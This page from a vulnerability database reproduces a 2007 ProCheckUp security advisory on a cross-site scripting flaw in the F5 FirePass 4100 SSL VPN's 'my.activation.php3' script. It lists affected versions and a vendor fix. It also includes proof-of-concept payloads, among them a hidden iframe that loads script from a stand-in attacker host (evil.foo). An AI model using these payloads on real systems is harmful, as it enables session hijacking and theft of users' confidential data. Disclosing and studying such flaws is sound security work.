Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ProCheckUp Security Advisory 2007.14

🗓️ 02 Dec 2007 00:00:00Reported by Adrian PastorType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

F5 FirePass 4100 SSL VPN XSS Vulnerability in 'my.activation.php3

Code
`PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script  
  
Date Found: 19th June 2007  
  
Successfully tested on: version 5.5.2  
  
F5 Networks has confirmed the following versions to be vulnerable:  
  
FirePass versions 5.4.1 - 5.5.2  
FirePass versions 6.0 - 6.0.1  
  
Description:  
  
F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.activation.php3" server-side script.  
  
No authentication is required to exploit this vulnerability.  
  
Consequences:  
  
An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.  
  
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.  
  
Proof of concept (PoC) URL:  
  
https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test</textarea><!--  
  
The payload in the example is  
  
"></script><textarea>HTML_injection_test</textarea><!--  
  
which injects a 'textarea' box  
  
The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b' in this case):  
  
<html>  
  
<iframe src="https://target.tld/my.activation.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>  
  
</html>  
  
Successfully tested on:  
  
Server environment:  
  
F5 FirePass 4100  
  
Client environment:  
  
Microsoft Internet Explorer 7.0.5730.11  
  
Severity: Medium/High  
  
Authors: Adrian Pastor and Jan Fry of ProCheckUp Ltd (www.procheckup.com).  
  
With thanks to Petko D. Petkov for suggesting the eval(name) technique.  
  
References:  
  
http://www.procheckup.com/Vulnerability_2007.php  
http://www.f5.com/products/FirePass/  
  
Fix:  
  
F5 Networks has issued SOL7923:  
  
https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Dec 2007 00:00Current
0.2Low risk
Vulners AI Score0.2
f5 firepass 4100ssl vpnxsshtml injectionvulnerabilitysecurity advisorycross-site scriptingf5 networksfirepassserver-side scriptversion 5.5.2authenticationconsequencesproof of conceptpoc urlpayloadpoc html pageseverityauthorsreferencesfix
21